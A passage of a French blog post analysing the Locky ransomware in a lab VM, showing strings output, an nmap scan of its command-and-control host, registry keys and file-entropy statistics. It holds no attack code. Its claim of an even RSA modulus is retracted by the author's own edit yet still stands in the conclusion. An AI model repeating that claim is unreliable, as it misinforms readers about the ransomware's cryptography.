Une fois le fichier téléchargé, nous récidivons avec « strings » : on trouve quelques petites choses : un lien de débug dans le code ainsi que l’appel à toute une collection de fonction de chiffrement Windows.

 :~$ strings charge.exe | grep pdb
 Z:\ediu\42dttsh\n2i1tn\jhslvxe.pdb
 :~$ strings charge.exe | grep Crypt
 CryptDestroyHash
 CryptDeriveKey
 CryptEncrypt
 CryptAcquireContextA
 CryptReleaseContext
 CryptCreateHash
 CryptDestroyKey
 CryptDecrypt
 CryptHashData
 :~$ strings charge.exe  | grep -i keyboard
 GetKeyboardLayout

Autre point intéressant, une des premières choses faites par le programme est de vérifier la configuration du clavier : Il y a fort à parier qu’un « layout RU » rende le joujou inoffensif.

Sur notre machine virtuelle, nous éxécutons le fichier malveillan et nous remarquons un appel DNS vers le domaine kqlxtqptsmys.in.

Nous effectuons alors un scan de port  :

 :~$ sudo nmap -T4 -A  xsso.kqlxtqptsmys.in
 Nmap scan report for xsso.kqlxtqptsmys.in (195.22.28.198)
 Host is up (0.039s latency).
 Other addresses for xsso.kqlxtqptsmys.in (not scanned): 195.22.28.196 195.22.28.197 195.22.28.199
 Not shown: 968 closed ports
 PORT      STATE    SERVICE      VERSION
 53/tcp    open     http         nginx
 80/tcp    open     http         nginx
 82/tcp    open     http         nginx
 88/tcp    open     http         nginx
 443/tcp   open     http         nginx
 |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
 |_http-title: 400 The plain HTTP request was sent to HTTPS port
 | ssl-cert: Subject: commonName=lolcat
 | Not valid before: 2009-04-02T14:49:38+00:00
 |_Not valid after:  2019-03-31T14:49:38+00:00
 |_ssl-date: 2030-02-23T05:05:21+00:00; +14y3d19h18m09s from local time.
 | tls-nextprotoneg:
 |_  http/1.1
 801/tcp   open     http         nginx
 1001/tcp  open     http         nginx
 3333/tcp  open     http         nginx
 4000/tcp  open     http         nginx
 5959/tcp  open     http         nginx
 6969/tcp  open     http         nginx
 8080/tcp  open     http         nginx
 8383/tcp  open     http         nginx
 |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
 |_http-title: 400 The plain HTTP request was sent to HTTPS port
 10002/tcp open     http         nginx

(Pour plus de lisibilité, nous avons épuré la sortie de nmap)
Bref, cela fait tout de même beaucoup de service http sur des ports exotiques…

Nous constatons par ailleurs un beau dialogue entre ce serveur et notre machine :

Notre capture réseau est intéressante car contrairement à Dridex, le trafic entre notre machine et le serveur C&C de nos amis slaves n’est pas chiffré en SSL (du coup pas de besoin de déchiffrer pour voir ce qui se passe) mais semble par ailleurs obfusqué par un mécanisme propre : quoiqu’il en soit le contenu des requêtes POST est a priori assez encodé : Cela semble être confirmé par des gens qui ont dépioté le binaire.

Le chiffrement

En parallèle, le logiciel malveillant n’a pas chomé sur notre machine virtuelle et à renommer une bonne partie de nos fichiers en truc incompréhensible mais avec une extension .locky : On peut cependant une logique les 16 premiers caractères représentent notre identifiant (ils sont communs à tous nos fichiers et nous serons utiles pour récupérer le contenu de nos fichiers), les 16 autres semblent être aléatoires et varient d’un fichier à un autre.

B623F7F0B6909B39CB34337AD10DFCD6.locky

Nous avons en plus un petit fichier texte qui s’est ouvert nous précisant la procédure pour récupérer nos précieux fichiers : en prenant bien soin de préciser que nos fichiers ont été chiffrés en RSA-2048 et AES-128.

Enfin en fouinant dans la base de registre, on tombe sur des clés Locky qui contient plusieurs champs [HKEY_CURRENT_USER\Software\Locky]

Nous pouvons donc récupérer notre clé publique et c’est là où ca devient encore plus intéressant : notre clé publique est étrange :

"pubkey"=hex:06,02,00,00,00,a4,00,00,52,53,41,31,00,08,00,00,01,00,01,00,89,6e,\
  34,7c,85,06,57,0a,1f,31,4b,ed,ab,65,82,3b,1e,23,d8,b1,2d,31,dd,1a,f1,e0,ee,\
  14,e6,64,e7,7d,99,48,54,b9,f4,96,78,a3,0a,8a,77,71,c3,5f,ba,3a,d2,72,ba,a5,\
  45,50,91,cd,18,2a,63,6b,42,90,bc,51,03,df,15,49,c1,43,2f,11,e8,fc,27,d6,1a,\
  6b,7a,d9,ec,d9,1b,b5,0c,e5,5b,87,e6,29,77,8c,26,68,3e,e9,cf,81,1a,a3,0c,dd,\
  90,f8,6f,88,d5,e0,3e,c2,26,4d,2e,1b,b7,c5,2b,7e,66,48,3d,93,35,72,a5,65,f1,\
  d1,77,51,22,40,9c,18,cf,6a,7f,03,7d,05,58,6d,ce,71,be,3d,2d,ce,01,31,3a,4b,\
  2a,5c,e8,ba,c3,9a,e2,a2,44,33,97,85,a5,32,e6,88,16,27,86,29,7a,ed,6b,57,31,\
  68,46,45,62,97,55,c6,dd,60,10,92,1b,d3,ab,24,6e,2d,bb,29,3f,7f,22,0d,c0,54,\
  c3,59,30,02,35,aa,44,7e,06,46,59,6e,2e,72,7c,cb,0f,5a,55,eb,30,dd,cb,9e,17,\
  c4,5c,87,20,e4,53,5f,21,6e,0f,3f,87,2a,7f,2a,63,a3,de,f8,2e,91,93,7a,35,c5,\
  ed,f2,cc,c0

Certes nous avons un exposant public classique (65537 ou 0x10001), mais le modulus est pair et a plusieurs diviseurs triviaux (ou pas):

Du coup, nous sommes en droit de nous poser des questions sur leur système de génération de clé RSA (cependant il n’est pas à exclure que le modulus soit lui-même encodé). [EDIT 160402] L’encode est en little endian… donc tout ce qui est écrit ici est caduque.

Par ailleurs, notons que si nous infectons plusieurs fois notre machine avec Locky (en prenant soins de supprimer les clés de registre associées), le même id et la même clé publique sont générés à nouveau.

Rajoutons ici que tous les fichiers ainsi chiffrés voient leur taille augmenter de 836 octects. En effet une chaîne de 836 octets commençant par  {0x93, 0xfe, 0x56, 0x89, <16 Octects de l’ID>} est systématiquement présentent en fin de fichier chiffré. En utilisant l’outils byte-stats.py (toujours de notre ami belge), on constate une entropie quasi parfaite du fichier : souvent synonyme de bon chiffrement !

:~$ python ../../byte-stats.py C2D7B61614A94593CB34337AD10DFCD6.locky
Byte ASCII Count     Pct
0xab        7214   0.38%
0x95        7231   0.38%
0xdc        7243   0.38%
0x26 &      7245   0.38%
0x53 S      7259   0.38%
...
0x9b        7634   0.40%
0xa3        7637   0.40%
0xf2        7666   0.40%
0xd2        7671   0.40%
0xc5        7672   0.40%

Size: 1906010  Bucket size: 10240  Bucket count: 186

                   File(s)           Minimum buckets   Maximum buckets
Entropy:           7.999900          7.977723          7.986161
                     Position:       0x000e8800        0x00016800
NULL bytes:            7515   0.39%        22   0.21%        58   0.57%
Control bytes:       200962  10.54%      1015   9.91%      1164  11.37%
Whitespace bytes:     45021   2.36%       205   2.00%       292   2.85%
Printable bytes:     699592  36.70%      3625  35.40%      3904  38.12%
High bytes:          952920  50.00%      4984  48.67%      5269  51.46%

Enfin et c’est là ce qui nous trouble le plus : deux fichiers textes contenant respectivement « Hello World » et « Hello World 2016 » chiffrés ont une différence de taille de 5 octects : tout comme les originaux.

Dans un cas de chiffrement par bloc classique (par exemple utilisation de AES-128-CBC), ces 2 fichiers devraient avoir la même taille (ou différer d’un multiple de 16 : taille du bloc de l’AES) : à moins que nos amis russes ne soient fans de mode exotique comme celui du challenge SSTIC 2015… mais nous en doutons !

Y aurait-il un lien avec les mauvaises pratiques de TeslaCrypt ?

A méditer donc…

Conclusion :

Si on résume, le fonctionnement est similaire à Dridex mais différe :

• Même technique de piégeage des fichiers
• La macro génère un fichier qui lui même génère un script (Dridex était plus directe)
• Les communications avec les C&C sont en claire (pas de SSL) contrairement à Dridex
• Le binaire n’est pas signé (contrairement à Dridex)
• Les fonctions de chiffrement ont des propriétés étonnantes (Parité du modulus RSA / fichier chiffré non multiple de 16).
• Sur nos tests : éteindre son poste violement (genre arracher le cable) permet d’éviter que tous les fichiers ne soient chiffrés.

Si jamais il y a des gens avec des compétences en retro-ingénierie qui veulent bien se pencher sur les fonctions de chiffrement de Locky: il y a peut être des choses à voir…Nous nous n’avons simplement pas les compétences…

[EDIT 20160324 :  Nous en avions rêvé Lexsi l’a fait :  et ça confirme certaines nos hypothèses et infirme les autres :)]

Et sinon de quand datent vos dernières sauvegardes ?